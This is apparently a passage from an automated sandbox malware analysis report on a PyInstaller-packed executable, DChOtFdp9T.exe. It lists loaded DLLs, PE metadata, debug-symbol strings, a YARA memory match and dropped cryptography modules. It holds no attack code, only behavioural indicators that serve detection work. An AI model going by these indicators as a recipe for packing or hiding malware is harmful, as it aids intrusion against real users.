        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libcrypto-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libssl-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libcrypto-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: DChOtFdp9T.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: DChOtFdp9T.exeStatic file information: File size 17118166 > 1048576
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: DChOtFdp9T.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687914565.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688219519.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685472622.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
        Source: Binary string: ucrtbase.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686106421.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685252137.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687144003.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687689879.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688330642.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB0A2000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685805435.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687322472.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686910903.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687577629.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DChOtFdp9T.exe, 00000001.00000002.1881450400.00007FFE132B1000.00000002.00000001.01000000.00000008.sdmp, _ctypes.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879602509.00007FFE101D7000.00000002.00000001.01000000.00000018.sdmp, _hashlib.pyd.0.dr
        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685320693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686476688.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684844639.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685398039.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879894522.00007FFE10308000.00000002.00000001.01000000.00000015.sdmp, _asyncio.pyd.0.dr
        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687464798.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: DChOtFdp9T.exe, 00000001.00000002.1879766821.00007FFE10252000.00000002.00000001.01000000.00000017.sdmp, pyexpat.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881200286.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686660312.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
        Source: Binary string: ucrtbase.pdbUGP source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880512904.00007FFE11ED9000.00000002.00000001.01000000.0000000E.sdmp, _socket.pyd.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688752351.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685695268.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687027078.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686366365.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685177805.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880596191.00007FFE120C6000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687394800.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686035517.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687990709.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686550010.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686216151.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880914876.00007FFE12E13000.00000002.00000001.01000000.0000000F.sdmp, select.pyd.0.dr
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688827777.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686729797.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687253081.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686838745.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685584111.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688107451.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685966419.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880682032.00007FFE126C3000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685896929.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872247576.0000017808110000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687837125.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688439421.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DChOtFdp9T.exe, 00000001.00000002.1880262151.00007FFE1150D000.00000002.00000001.01000000.00000012.sdmp, _ssl.pyd.0.dr
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: Yara matchFile source: Process Memory Space: DChOtFdp9T.exe PID: 4020, type: MEMORYSTR
        Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
        Source: python312.dll.0.drStatic PE information: section name: PyRuntim
        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
        Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
        Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF264331 push rcx; ret 1_2_00007FFDFF264332
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074B989 push rdi; ret 1_2_00007FFE0074B992
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0075145F push rdi; ret 1_2_00007FFE00751466
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00750D4D push rdi; ret 1_2_00007FFE00750D54
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074BEA5 push rdi; ret 1_2_00007FFE0074BEAB

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD5.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ofb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\ucrtbase.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\python312.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ctr.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cfb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2s.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ocb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\unicodedata.pydJump to dropped file
